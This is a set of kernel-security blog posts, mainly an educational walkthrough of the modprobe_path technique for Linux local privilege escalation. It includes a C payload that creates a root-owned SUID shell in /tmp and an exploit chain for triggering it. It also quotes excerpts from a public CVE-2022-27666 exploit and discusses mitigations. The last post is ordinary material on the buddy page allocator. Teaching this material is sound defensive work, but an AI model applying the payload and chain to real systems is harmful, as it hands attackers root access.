You will accumulate a lot of knowledge during your research and you won’t be able to retain all of it, nor will all of it be immediately useful. But having it neatly documented and easy to reference means that when you have to go back to it, you can. It also just helps to reinforce knowledge and understanding too.

Whether it’s coming back to a kernel module you’ve previously done work on and want a refresher, or if you found a heap shaping primitive in a previous CTF that would be a perfect fit for the one you’re working on now - having notes to refer back to is a life saver.

Staying Up-To-Date

Another useful part of your workflow to consider is keeping up-to-date with the latest kernel gossip. It seems like every week there’s a new write-up or poc dropping and it can be a lot to keep up with, especially when they’re from all over the place.

When I first asked a colleague how they found all these papers and write-ups, they replied Twitter and I scoffed. Surely not? But lo and behold, several years later I can confirm Twitter is still probably the best means to find this kind of content. It is what it is.

Alternatively of course, you can try to curate your own feed (e.g. via RSS or Atom) from the sources themselves and use a reader to catch updates.

Another source beyond blogs and news sites is of course mailing lists. Yep, they’re still a thing. The one I mainly keep an eye on is oss-security, which is where you’ll find public disclosures for linux kernel stuff if they went through the CVD process.

Furthermore, if you want to get granular and you’re looking for specific information don’t be afraid to dive into commit history or the lkml.

Having a Gameplan

We’re almost there, I promise! The last, but certainly not the least, aspect of the workflow I want to talk about is having a gameplan for approaching vred projects.

Whether it’s vulnerability research or exploit development, we’re dealing with inherently complex and open-ended problems, which may have no solution at all.

By approaching these problems with a structured methodology, we’re able to break down what can seem a daunting and overwhelming task into manageable chunks. Also, if we get to the end of it and don’t find that bug or pop that shell, we at least know we’ve tried our best and can take what we’ve learned and move onto the next task.

So instead of just diving into the problem and following each lead, I’d recommend figuring out a gameplan that works for you and trying to approach these problems in an ordered, methodical way.

Again, this is something that will vary from person to person, depending on how you work. It will also likely evolve over time as you do more of this kind of work, and that’s okay :)

For more concrete examples, I talk about this in my talk “E’rybody Gettin’ TIPC: Demystifying Remote Linux Kernel Exploitation”. The recording isn’t up yet, but you can see the slides here.

Resources

I’m already 3000 words deep so this resources section will be a work in progress and is far from exhaustive. If you have additions, feel free to @ me or DM me and I’ll get them in.

CTFs

HTB has some kernel pwn challenges to practice your skills with
smallkirby/kernelpwn seems like a decent curation of some kernel pwn challenges, with a section for beginners too :)

Reading Materials

No need to reinvent the wheel, absolutely check out the awesome repo Linux Kernel Exploitation, maintained by @andreyknvl, containing a wealth of papers and write-ups
linux-insides by 0xAX is a great low-level dive into some linux internals and was an inspiration for my own linternals series :)
LWN.net
sam4k/linux-kernel-resources is my attempt to curate some useful kernel tidbits related to compiling, debugging, instrumenting and patching the linux kernel

Tools

bootlin’s Elixir cross referencer for linux source; great for browsing different kernel versions with references & defs in the browser
Doom Emacs, my current IDE setup
hugsy/gef (GDB Enhanced Features), an addon for GDB to improve RE/xdev workflow

Video Materials

Black Hat (YouTube)
DEFCONConference (YouTube)
Hack In The Box Security Conference (YouTube)
OffensiveCon (YouTube)

Wrapping Up

Oof, that was a long one, huh? Unlike my other posts, this one has covered a particularly subjective topic. Typically the content of my posts is derived from some objective source like the Linux kernel, however this one has ultimately been the culmination of my own experiences, understanding and journey into linux vred.

That said, I hope that at least some of the insights I’ve shared today have been useful for you. Not everything I’ve talked about will apply to everyone, but fingers crossed there’s some helpful nuggets of information in there for each of you.

As always, I love to talk about this stuff and it means a lot to be able to help inspire and motivate people on their linux-y vred-y journeys. If you have any questions, suggestions or corrections then feel free to @ me or DM me on Twitter :)

Change History

I have a feeling this will see some updates and additions, so stay tuned here for any updates to the post.

exit(0);

Kernel Exploitation Techniques: modprobe_path

sam4k — Mon, 04 Jul 2022 14:54:17 +0000

I thought we’d kick things off with a modern day staple for local privilege escalation (LPE) in Linux Kernel Exploitation, modprobe_path.

The aim of this series on exploitation techniques is to provide byte-sized (lol, sorry) analyses on specific techniques and primitives used in kernel exploitation.

Focusing on explaining why and when these techniques are used, how they work and finally touching on existing, upcoming or speculative mitigations.

Overview
Diving In
- The Code
- A Pseudo Case-Study
  - Actual Examples
    - CVE-2022-27666 by @Etenal7
- Mitigations
  - So We’re All Good?
  - Alternatives
Conclusion

Overview

[modprobe](https://linux.die.net/man/8/modprobe) is a userspace program for adding and removing modules from the Linux kernel. When the kernel needs a feature that currently isn’t loaded into the kernel, it can use modprobe to load in the appropriate module.

One example of this is when a userspace process [execve()](https://linux.die.net/man/3/execve)’s a binary:

the kernel will look for the appropriate binary loader
if the binary’s header isn’t recognised, it will attempt to load the appropriate module, specifically binfmt-XXXX, where XXXX is the 16-bit value at byte offset 2 of the binary, printed as four hex digits
the kernel will attempt to load the module via modprobe, running it as root via the absolute path stored in the titular exported kernel symbol modprobe_path

With an arbitrary address write (AAW) primitive, and the address of the modprobe_path symbol, an attacker can overwrite modprobe_path with the path to a malicious binary X.

Then, by creating and executing a binary with an unknown header[1], an unprivileged attacker can cause the kernel to go through steps 1-3 above.

Except this time, it runs the overwritten modprobe_path as root, letting the attacker run malicious binary X as root, allowing for LPE.

[1] Specifically, as we’ll explain later, at least one of the first 4 bytes needs to be non-[printable()](https://elixir.bootlin.com/linux/v5.18.3/source/fs/exec.c#L1698), and the header can’t match an already supported format

Diving In

Now that we’ve got a high level overview of what we’re dealing with, let’s dive into some technical details as we explore the code path to executing modprobe_path, use cases for this technique and how it can be leveraged by attackers. Finally we’ll cover mitigations.

The Code

When we call the execve() family in userspace, directly or indirectly (such as running a program in your shell), it ultimately makes its way to the kernel via the [execve](https://man7.org/linux/man-pages/man2/execve.2.html) syscall:

SYSCALL_DEFINE3(execve,
		const char __user *, filename,
		const char __user *const __user *, argv,
		const char __user *const __user *, envp)
{
	return do_execve(getname(filename), argv, envp);
}

fs/exec.c (v5.18.5)

We’ll not get too bogged down in how programs actually get run in Linux, there’s plenty of great content out there on the topic[1].

What we’re interested in is the fact that in order to execute the program specified by filename, the kernel needs to understand what it’s trying to execute.

As mentioned earlier, part of this process involves [search_binary_handler(struct linux_binprm *bprm)](https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1702), where [struct linux_binprm](https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18) is the binary parameter struct which is used by the kernel to “hold the arguments that are used when loading binaries”[2].

[#0] search_binary_handler(...)
[#1] exec_binprm(...)
[#2] bprm_execve(...)
[#3] do_execveat_common(...)
[#4] do_execve(...)
[#5] SYSCALL_DEFINE3(execve,...) 
[#6] userspace makes execve() syscall

Pseudo-backtrace up to search_binary_handler()

As per the source comments, this function “cycle[s] the list of binary formats handler, until one recognizes the image”. These binary format handlers are represented by [struct linux_binfmt](https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L85) and are stored in the doubly linked list, [formats](https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L82).

static int search_binary_handler(struct linux_binprm *bprm)
{
	bool need_retry = IS_ENABLED(CONFIG_MODULES);
	struct linux_binfmt *fmt;
	int retval;
    
	...
 retry:
	read_lock(&binfmt_lock);
	list_for_each_entry(fmt, &formats, lh) {
		if (!try_module_get(fmt->module))
			continue;
		read_unlock(&binfmt_lock);

		retval = fmt->load_binary(bprm);

		read_lock(&binfmt_lock);
		put_binfmt(fmt);
		if (bprm->point_of_no_return || (retval != -ENOEXEC)) {
			read_unlock(&binfmt_lock);
			return retval;
		}
	}
	read_unlock(&binfmt_lock);

	if (need_retry) {
		if (printable(bprm->buf[0]) && printable(bprm->buf[1]) &&
		    printable(bprm->buf[2]) && printable(bprm->buf[3]))
			return retval;
		if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
			return retval;
		need_retry = false;
		goto retry;
	}

	return retval;
}

fs/exec.c (v5.18.5)

Looking at the code above, we can see that search_binary_handler() iterates over each binary format in formats [line 10]. As we iterate over each format, we see if that format’s load_binary()[3] implementation can process our bprm (which contains a buffer, buf, holding up to the first [BINPRM_BUF_SIZE](https://elixir.bootlin.com/linux/v5.18.5/source/include/uapi/linux/binfmts.h#L19) bytes of data from our executable) [line 15].

If we managed to load the binary, we can return successfully [line 21], otherwise if we’ve tried all the formats in formats and CONFIG_MODULES[4] is set, we hit the block starting line 27.

Then comes the check [line 27] we mentioned earlier: if the first 4 bytes of our executable are all printable(), we return here.

#define printable(c) (((c)=='\t') || ((c)=='\n') || (0x20<=(c) && (c)<=0x7e))

fs/exec.c (v5.18.5)

printable() is a simple macro that yields true if char c is an ASCII printable character (a tab, newline, space or other ASCII characters you see on your keyboard).

So, if the first four bytes of the binary contain one or more non-printable() bytes[5] then comes the interesting part [line 30]: the kernel will attempt to find the appropriate binary format handler by trying to load a module of the expected name “binfmt-XXXX”, where XXXX is the hex representation of the 16-bit value read from byte offset 2 of our executable (note the %04x and bprm->buf + 2 in the request_module() call).

For reference we can find the following modules in the kernel (where - and _ are interchangeable in module names): binfmt_elf, binfmt_script, binfmt_aout. If we tried to execve() a binary whose first four bytes were 0xFFFFFFFF, the kernel thread handling the execve() syscall would ultimately reach line 30 and try to request_module("binfmt-ffff").

If we take a look at how request_module() is implemented, we can see that it is actually a macro for __request_module():

int __request_module(bool wait, const char *name, ...);
#define request_module(mod...) __request_module(true, mod)

include/linux/kmod.h (v5.18.5)

By taking a look at __request_module() we can see that, after carrying out the necessary sanity and security checks, it ultimately calls call_modprobe() [line 29]:

/**
 * __request_module - try to load a kernel module
 * @wait: wait (or not) for the operation to complete
 * @fmt: printf style format string for the name of the module
 * @...: arguments as specified in the format string
 ...
 * If module auto-loading support is disabled then this function
 * simply returns -ENOENT.
 */
int __request_module(bool wait, const char *fmt, ...)
{
	va_list args;
	char module_name[MODULE_NAME_LEN];
	int ret;

    ...
	if (!modprobe_path[0])
		return -ENOENT;

    ...
	if (ret >= MODULE_NAME_LEN)
		return -ENAMETOOLONG;

	ret = security_kernel_module_request(module_name);
	if (ret)
		return ret;

    ...
	ret = call_modprobe(module_name, wait ? UMH_WAIT_PROC : UMH_WAIT_EXEC);
    ...
}

kernel/kmod.c (v5.18.5)

Finally (we’re almost there, I promise!) we reach call_modprobe(). I’ll avoid spamming you with more source, but for context, [call_usermodehelper_setup()](https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-setup.html) [line 25] prepares the kernel to “call a usermode helper”, which for us right now essentially means running an executable in userspace as root. [call_usermodehelper_exec()](https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-exec.html) [line 30] then does the job.

static int call_modprobe(char *module_name, int wait)
{
	struct subprocess_info *info;
	static char *envp[] = {
		"HOME=/",
		"TERM=linux",
		"PATH=/sbin:/usr/sbin:/bin:/usr/bin",
		NULL
	};

	char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
	if (!argv)
		goto out;

	module_name = kstrdup(module_name, GFP_KERNEL);
	if (!module_name)
		goto free_argv;

	argv[0] = modprobe_path;
	argv[1] = "-q";
	argv[2] = "--";
	argv[3] = module_name;	/* check free_modprobe_argv() */
	argv[4] = NULL;

	info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
					 NULL, free_modprobe_argv, NULL);
	if (!info)
		goto free_module_name;

	return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
	...
}

On lines 19-23 you can see the argument vector we’re using. So in our current context of a typical Linux system these days, trying to execute a binary beginning 0xFFFFFFFF, as an unprivileged user we’d ultimately be running the bash equivalent of:

root# /usr/bin/modprobe -q -- binfmt-ffff

Where /usr/bin/modprobe is the value found in the kernel symbol modprobe_path.

What’s important here is that the binary being executed in this root process is defined by the value of the kernel symbol modprobe_path.

A Pseudo Case-Study

To recap what we’ve covered so far:

An unprivileged user can create a binary starting 0xFFFFFFFF and try to execve() it, causing the kernel to create a root process running the equivalent of $modprobe_path -q -- binfmt-ffff, where $modprobe_path here is the value stored in the kernel symbol modprobe_path
As a result, if an attacker can control modprobe_path then they can control the binary being executed by the root process

Wait, so we need to overwrite a kernel symbol? If we can already do that haven’t we already won?! Valid questions! The kernel is vast and complex, as such so is kernel exploitation - there are many types of bugs and ways to achieve privilege escalation.

Similarly, the motivations and goals of attackers vary. As we’re looking at LPEs, let’s assume the goal here is to go from unprivileged user to having root access.

Take this (very) simplistic view where we have a kernel memory corruption vulnerability, such as a heap buffer overflow. Ideally, we’re able to leverage this to gain a control flow hijacking primitive (CFHP), where we can influence the flow of kernel code execution; say we manage to use our overflow to corrupt a pointer[6] and go from there.

If we can use our CFHP to overwrite arbitrary kernel addresses, we can use the modprobe_path technique we’ve talked about to make the final pivot from kernel code execution to having root access in userspace (which is much more usable lol).

How, you ask? Well, first things first let’s take a look at an example of a typical payload binary we can point modprobe_path to:

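#include <stdlib.h>

int main(void)
{
    system("cp /usr/bin/sh /tmp/sh");   /* copy a shell somewhere we can reach */
    system("chown root:root /tmp/sh");  /* make sure root owns the copy */
    system("chmod 4755 /tmp/sh");       /* set the SUID bit */
    return 0;
}

This payload copies a shell to /tmp/sh, sets its owner to root (the chown call), and then gives it the SUID bit (the chmod call).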

This bit means that regardless of who runs the file, it runs with the owner’s permissions. In this instance, if a user runs /tmp/sh after this, they will get a root shell[7].

So, to wrap our pseudo case-study up, our overall exploit chain might look like this:

Create a binary (e.g. /tmp/trigger) to trigger the execution of modprobe_path as root via the kernel’s usermodehelper, by starting it with bytes 0xFFFFFFFF
Compile & place the payload from the snippet above (e.g. /tmp/pwn)
Trigger our arbitrary address write (e.g. via some kernel mem corruption bug), using the AAW primitive to overwrite modprobe_path with our payload, /tmp/pwn
Execute /tmp/trigger, which will cause the kernel to run /tmp/pwn (the new value of modprobe_path) as root
As an unprivileged user we can now get a root shell by running /tmp/sh which is now a SUID executable owned by root

Actual Examples

So we’ve covered a hasty pseudo-case study of how an attacker might use this modprobe_path technique to escalate privileges via a kernel AAW. Below are a few recent real-world write-ups and examples of this technique put to use:

CVE-2022-27666 by @Etenal7

I’ve actually retroactively added this section after finishing the post, figuring it can’t hurt to explore some real-world exploit code making use of this technique.

So using what we’ve learnt so far, particularly from our pseudo-case study, let’s see how @Etenal7 makes use of this technique in their exploit (repo here).

To read more on the memory corruption side of things and how they get an AAW primitive to be able to overwrite modprobe_path, check out the awesome write-up. The tl;dr is they exploit an 8-page heap overflow (CVE-2022-27666), do some neat heap feng shui with the page allocator and the slab allocator, to ultimately gain a KASLR leak and AAW primitive.

Diving in, first of all we can see a similar payload in the file [get_rooot.c](https://github.com/plummm/CVE-2022-27666/blob/main/get_rooot.c):

#include 
#include 

int main()
{
    system("chown root:root /tmp/myshell");       [0]
    system("chmod 4755 /tmp/myshell");            [1]
    system("/usr/bin/touch /tmp/exploited");      [2]
}

get_rooot.c

Besides creating a root owned [0] SUID [1] shell, they also create a marker file /tmp/exploited to easily check the payload has been run later [2].

Moving onto the core exploit logic, over in [poc.c](https://github.com/plummm/CVE-2022-27666/blob/main/poc.c), we can see the setup of the invalid binary used to eventually trigger modprobe_path:

...
#define PROC_MODPROBE_TRIGGER "/tmp/modprobe_trigger"
...
void modprobe_trigger()
{
  execve(PROC_MODPROBE_TRIGGER, NULL, NULL);
}
...
void modprobe_init()
{
  int fd = open(PROC_MODPROBE_TRIGGER, O_RDWR | O_CREAT);      [0]
  if (fd < 0)
  {
      perror("trigger creation failed");
      exit(-1);
  }
  char root[] = "\xff\xff\xff\xff";                            
  write(fd, root, sizeof(root));                               [1]
  close(fd);
  chmod(PROC_MODPROBE_TRIGGER, 0777);                          [2]
}

poc.c

We can see they programmatically create the modprobe_path trigger in modprobe_init(), creating an executable [2] at path PROC_MODPROBE_TRIGGER [0] which simply consists of an invalid 4 byte header, "\xff\xff\xff\xff" [1].

This can later be triggered via modprobe_trigger() to make the kernel execute the (hopefully overwritten) modprobe_path.

Below I’ve highlighted the code responsible for performing the AAW, triggering the corrupted modprobe_path and finally popping the payload:

char *evil_str = "/tmp/get_rooot\x00"; [0] (from fuse_evil.c)
...
void overwrite_modprobe()
{
  void *modprobe_path = addr_modprobe_path + kaslr_offset; [1]
  ...

    ...
    arb_write(modprobe_path-8, strlen(evil_str), ...);     [2]
    ...
    sleep(1);
    modprobe_trigger();                                    [3]
    sleep(1);
    if (am_i_root()) {                                     [4]
      ...                                                  [5]
    }
    printf("[+] Not root, try again\n");
  }
  ...
}

int am_i_root()
{
  struct stat buffer;
  int exist = stat("/tmp/exploited", &buffer);
  if(exist == 0)
      return 1;
  else  
      return 0;
}

poc.c

First they use the leaked KASLR offset to work out the address of the modprobe_path kernel symbol [1]. Next, the AAW is triggered [2], overwriting the original value of modprobe_path with the path to the payload, /tmp/get_rooot [0].

Then, with modprobe_path hopefully overwritten, they call modprobe_trigger() [3] to execute the invalid binary so the kernel ultimately executes the new modprobe_path.

Finally am_i_root() is called [4] to check for success by looking for the marker file /tmp/exploited that is created when the payload /tmp/get_rooot is run by usermodehelper. If it exists, we can pop a shell [5].

Mitigations

Now we have an understanding of the technique, how it’s used to facilitate LPE and some examples of real-world use cases … how do we mitigate it?

CONFIG_STATIC_USERMODEHELPER was introduced in 4.11[8], back in 2017 by Greg KH[9], specifically to mitigate this kind of attack surface.

One Helper to Rule Them All

Looking at call_modprobe() earlier, the kernel specifies an executable path via call_usermodehelper_setup(path, ...) and then call_usermodehelper_exec() will execute the binary specified by path. What’s relevant to us is that modprobe_path is passed to call_usermodehelper_setup(), and we can change modprobe_path.

With this config enabled, regardless of the path passed to call_usermodehelper_setup(), the kernel will only directly execute a single usermode binary defined by CONFIG_STATIC_USERMODEHELPER_PATH[10]. This path is read-only, so can’t be changed (without write protection bit flipping shenanigans[11]).

struct subprocess_info *call_usermodehelper_setup(const char *path, ...)
{
	struct subprocess_info *sub_info;
	...
    
#ifdef CONFIG_STATIC_USERMODEHELPER
	sub_info->path = CONFIG_STATIC_USERMODEHELPER_PATH;
#else
	sub_info->path = path;
#endif

	...
}

kernel/umh.c (v5.18.5)

It is then the task of the static executable defined by CONFIG_STATIC_USERMODEHELPER_PATH to call the appropriate usermode helper, e.g. /usr/bin/modprobe.

Alternatively, CONFIG_STATIC_USERMODEHELPER can be enabled but CONFIG_STATIC_USERMODEHELPER_PATH can be set to "", disabling all usermode helper programs entirely; completely mitigating the modprobe_path technique.

So We’re All Good?

Awesome, you mean this whole thing was patched back in 2017? EZ PZ, next technique pls. Not so fast! Despite being introduced into the kernel back in 4.11, it still hasn’t made its way into the default configurations for many popular distributions.

As of writing, this includes the latest versions of Ubuntu, Fedora and EndeavourOS; I’m sure there’s many more but that’s all I know off the top of my head.

You can check your system by searching your config, typically in /boot/config... or /proc/config.gz, for CONFIG_STATIC_USERMODEHELPER. Alternatively I heartily recommend @a13xp0p0v’s kconfig-hardened-check.

I don’t mean to point fingers though, the Linux ecosystem is vast and complex, with many moving parts and users. I can imagine there’s plenty of components that make assumptions about/rely on usermodehelper, making removing it outright (via not setting CONFIG_STATIC_USERMODEHELPER_PATH) difficult?

The alternative is to implement the single usermode helper in such a way as to securely carry out the same functionality for users of usermodehelper while still mitigating similar attack surfaces and not introducing new ones.

Alternatives

CONFIG_STATIC_USERMODEHELPER isn’t the only way to mitigate this technique, but it is one of the more direct, having been designed with this attack surface in mind.

From the code analysis earlier, some of you will also have noticed the more heavy handed approach of disabling CONFIG_MODULES entirely, making the request_module() code path unreachable, along with any module loading for that matter - certainly an effective mitigation.

However, this approach suffers the same issue (though to a greater extent) as disabling usermodehelper, in that it’s gonna remove a pretty integral feature that many aspects of modern distros for your average user have come to make use of.

That’s not to say there isn’t an argument for disabling autoloading, reducing a broader attack surface than CONFIG_STATIC_USERMODEHELPER; it all depends on use case.

[1] http://www.vishalchovatiya.com/program-gets-run-linux/
[2] From the comment above the [struct linux_binprm](https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18) definition
[3] e.g. load_elf_binary(), load_script()
[4] CONFIG_MODULES enables loadable module support; without this we can’t modprobe new modules into the kernel
[5] I believe the intention behind this check is to skip invoking request_module() for plain-text files (that haven’t already been picked up by binfmt_script at this point), under the assumption other binary formats will have at least one non-printable byte.
[6] If KASLR is present we also need an information leak to know the address of kernel symbols, e.g. modprobe_path, in order to rewrite it
[7] https://www.redhat.com/sysadmin/suid-sgid-sticky-bit
[8] https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html
[9] https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64e90a8acb8590c2468c919f803652f081e3a4bf
[10] https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER_PATH.html
[11] Which, while doable, shifts the requirements from arbitrary kernel address write to a very lenient ROP chain or some kernel shellcode execution

Conclusion

Not gonna lie, I thought this series might be an opportunity for me to whack out some shorter <1000 word posts, but alas. Regardless, hopefully I’ve given you some useful insights and an understanding into a popular technique used in kernel exploit development to achieve local privilege escalation on modern kernels.

Although an effective mitigation exists within the kernel, this doesn’t protect anyone unless it’s enabled in the kernel configuration. This technique is particularly popular among attackers, as it’s a relatively low maintenance technique, requiring the offset for only one kernel symbol: modprobe_path. Of course, you still need an AAW primitive.

Going forward, there’s plenty more content for me to dive into. If you have anything in particular you’re eager for me to cover, feel free to @ me.

Some ideas include tackling the various aspects of heap feng shui, ROP chains and its various sub-strands, broader approaches to exploiting various bug types such as use-after-frees, overflows etc. The list goes on and on! But that’s all for now.

exit(0);

LiKE: A Series on Linux Kernel Exploitation

sam4k — Mon, 04 Jul 2022 14:50:00 +0000

So you thought the Linternals series was hype? Get ready for the even SEO friendlier LiKE, a series on all things Linux kernel exploitation.

I just couldn’t help myself, despite spending my work days doing kernel exploit development, I’m just that keen that I want to also cover it on my personal blog.

Seriously though, I think it’s an extremely interesting topic for us to cover and will tie in nicely with the kernel internals knowledge we pick up from the Linternals series.

Highlighted well in P0’s recent post “The More You Know, The More You Know You Don’t Know”, I think there is value in sharing and educating industry on the methodology and techniques that are being used by attackers. Plus kernel stuff is just cool right?

In terms of actual content, there’s lots of scope for topics we can cover, and I’m happy to hear your thoughts and suggestions. I have a few different areas I’d like to cover:

Kernel exploitation techniques: oftentimes kernel exploitation techniques are covered as part of a broader post on exploiting a particular bug, so I want to spend some time putting the spotlight on specific techniques - talking about when, why and how they’re used as well as covering existing, future or possible mitigations.
Perhaps also highlighting mitigations? Talking about existing or upcoming security mitigations and how they impact(ed) the kernel exploitation space
Classic kernel writeups: whether CTFs or real world PoCs, I’m happy to spend some time providing technical coverage/analysis of cool stuff if that content isn’t already out there

Feel free to fire any questions, suggestions or *gasp* corrections my way @sam4k.

~~Similar to the Linternals post, going forward I’ll keep this up-to-date as a sort of table of content for published posts in the LiKE series.~~

I’ve since moved the contents to a standalone page, which you can reach from the navigation bar at the top, to keep things a bit more organised!

exit(0);

Linternals: Introducing Memory Allocators & The Page Allocator

sam4k — Fri, 10 Jun 2022 16:30:00 +0000

I know you’ve all been waiting for it, that’s right, we’re going to be taking a dive into another exciting aspect of Linux internals: memory allocators!

Don’t worry, I haven’t forgotten about the virtual memory series, but today I thought we’d spice things up and shift our focus towards memory allocation in the Linux kernel. As always, I’ll aim to lay the groundwork with a high level overview of things before gradually diving into some more detail.

In this first part (of many, no doubt), we’ll cover the role of memory allocators within the Linux kernel at a high level to give some general context on the topic. We’ll then take a look at the first of two types of allocator used by the kernel: the buddy (page) allocator.

We’ll cover the high level implementation of the buddy allocator, with some code snippets from the kernel to complement this understanding, before diving into some more detail and wrapping things up by talking about some pros/cons of the buddy allocator.

0x01 So, Memory Allocators?
0x02 The Buddy (Page) Allocator
Next Time!

0x01 So, Memory Allocators?

Alright, let’s get stuck in! Like I mentioned, we’ll start with the basics - what is a memory allocator? I could just say we’re talking about a collection of code which looks to manage available memory, typically providing an API to allocate() and free() this memory.

But what does that mean? For a moment let’s forget about the complexities of modern day memory management in OS’s, with all the various interconnected components:

Picture a computer with some physical memory, running a Linux kernel and a lot of usermode processes (think of all the chrome tabs). Both the kernel and the various user processes require physical memory to store the various data behind the virtual mappings we covered in parts 2 & 3 of the virtual memory series.

Now picture the absolute chaos as processes are using the same physical memory addresses at the same time, clobbering each other’s data, oh lord, even the kernel’s data is getting overwritten? Is that chrome tab even using a physical address that exists?!

That is where the kernel’s memory allocator comes in, acting as a gatekeeper of sorts for allocating memory when it is needed. Its job is to keep track of how much memory there is, what’s free and what’s in use.

Rather than every process for themselves, if something requires a chunk of memory to store stuff in, it asks the memory allocator - simple enough right?

0x02 The Buddy (Page) Allocator

Now we’ve got a high level understanding of memory allocators, let’s take a look at how memory is managed and allocated in the Linux kernel.

While several implementations for memory allocation exist within the Linux kernel, they mainly work on top of the buddy allocator (aka page allocator), making it the fundamental memory allocator within the Linux kernel.

Page Primer

At this point, we should probably rewind and clarify what exactly a “page” is. As part of its memory management approach, the Linux kernel (along with the CPU) divides virtual memory into “pages” which are [PAGE_SIZE](https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18) bytes of contiguous virtual memory.

Typically defined as 0x1000 bytes, or 4KB, pages are the common unit for managing memory in the Linux kernel. This is why you’ll often see things in memory aligned on page boundaries, for example.
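To make the “aligned on page boundaries” bit concrete, here’s a minimal userspace sketch of the usual rounding arithmetic, assuming the typical 0x1000 page size. The TOY_/toy_ names are made up for illustration (the kernel has its own PAGE_ALIGN() macro for this sort of thing):

```c
#include <stdbool.h>
#include <stdint.h>

#define TOY_PAGE_SIZE 0x1000ULL  /* assumption: 4KB pages */

/* Round an address down to the start of the page containing it. */
static uint64_t toy_page_align_down(uint64_t addr)
{
    return addr & ~(TOY_PAGE_SIZE - 1);
}

/* Round an address up to the next page boundary (no-op if already aligned). */
static uint64_t toy_page_align_up(uint64_t addr)
{
    return (addr + TOY_PAGE_SIZE - 1) & ~(TOY_PAGE_SIZE - 1);
}

/* True if the address sits exactly on a page boundary. */
static bool toy_is_page_aligned(uint64_t addr)
{
    return (addr & (TOY_PAGE_SIZE - 1)) == 0;
}
```

This only works because the page size is a power of two, so the low 12 bits of an address are simply the offset into its page.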

Anyway, while a fascinating topic, I’ll not derail us too much! However this is definitely something I’ll touch on in more detail in future posts, so don’t worry :)

❗

Going forward, unless I’m explicit, in examples using PAGE_SIZE, I’ll assume a typical PAGE_SIZE of 0x1000.

Buddy System Algorithm

Back to the topic at hand - we’ve covered where the “page” in page allocator comes from, what about the buddy part? Cue the buddy system algorithm (BSA) behind the buddy allocator, starting with the basics:

The buddy allocator tracks free chunks of physically contiguous memory via a freelist, [free_area[MAX_ORDER]](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L632), which is an array of [struct free_area](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L108).

Each struct free_area in the freelist contains a doubly linked circular list (the [struct list_head](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/types.h#L178)) pointing to the free chunks of memory.

...
struct free_area        free_area[MAX_ORDER]; 
...

struct free_area {
    struct list_head    free_list; 
    unsigned long       nr_free;
};

simplified from /include/linux/mmzone.h

Each struct free_area’s linked list points to free, physically contiguous chunks of memory which are all the same size. The buddy allocator uses the index into the freelist, free_area[], to categorise the size of these free chunks of memory.

This index is called the “order” of the list, such that the free chunks of memory it points to are each 2^order * [PAGE_SIZE](https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18) bytes in size:

free_area[0] points to a struct free_area whose free_list contains a list of free chunks of physically contiguous memory; each being 2^0 * 0x1000 bytes == 0x1000 bytes AKA order-0 pages.
free_area[1] points to a struct free_area whose free_list contains a list of free chunks of physically contiguous memory; each being 2^1 * 0x1000 bytes == 0x2000 bytes AKA order-1 pages.
…
free_area[[MAX_ORDER](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L28) - 1] points to a struct free_area whose free_list contains a list of free chunks of physically contiguous memory; each being 2^(MAX_ORDER - 1) * 0x1000 bytes (the array has MAX_ORDER entries, so this is the last valid index)
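As a quick sanity check of those sizes, here’s a minimal sketch of the order-to-size arithmetic. It assumes 4KB pages and the v5.18 default of 11 freelists (orders 0 to 10); the TOY_ names are hypothetical stand-ins, not kernel definitions:

```c
#define TOY_PAGE_SIZE 0x1000UL  /* assumption: 4KB pages */
#define TOY_MAX_ORDER 11        /* assumption: 11 freelists, orders 0..10 */

/* Size in bytes of a single free chunk on the order-n freelist. */
static unsigned long toy_order_to_bytes(unsigned int order)
{
    return TOY_PAGE_SIZE << order;  /* 2^order * PAGE_SIZE */
}
```

So under these assumptions the biggest chunk the allocator tracks, order 10, works out at 0x400000 bytes (4MB).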

Okay, what’s this got to do with buddies Sam?! Good question! One that brings us onto how the buddy allocator (de)allocates all this free memory it tracks.

Being the buddy allocator, it provides an API for users to both allocate and free all these various sized, physically contiguous chunks of memory. If we want to call the equivalent of allocate(0x4000 bytes), what does this look like at a high level?

Determine what order-n page satisfies the size of our allocation, in maths world, they do this via log stuff: log2(alloc_size_in_pages), rounded up to the nearest int, will give us the appropriate order! Here, it’s 2.
As the order is also the index into the freelist, we can check the corresponding free_area[2]->free_list to find a free chunk. If there is one, hoorah! We dequeue it from the list as it’s no longer free and we can tell the caller about their newly acquired memory
However, if free_area[2]->free_list is empty, the buddy allocator will check the free_list of the next order up, in this case free_area[3]->free_list. If there’s a free chunk, the allocator will then do the following:

Remove the chunk from free_area[3]->free_list
Halve the chunk (as any order-n page is guaranteed to be exactly twice the size of the order-n-1 page, as well as being physically contiguous in memory), creating two buddies! (I told you we’d get round to it!)
One chunk is returned to the caller who requested the allocation, while the other chunk is now migrated to the order-n-1 list, free_area[2]->free_list in this case
On freeing, the allocator will check whether the chunk’s physically adjacent buddy is also free and, if so, remerge the pair into a chunk of the next order up (repeating for as long as it keeps finding free buddies)

that’s right, i made a gif

If free_area[3]->free_list is also empty, the allocator will continue to check the higher order freelists until either it finds a free chunk or the request fails (if there are no free chunks in any of the higher orders either).
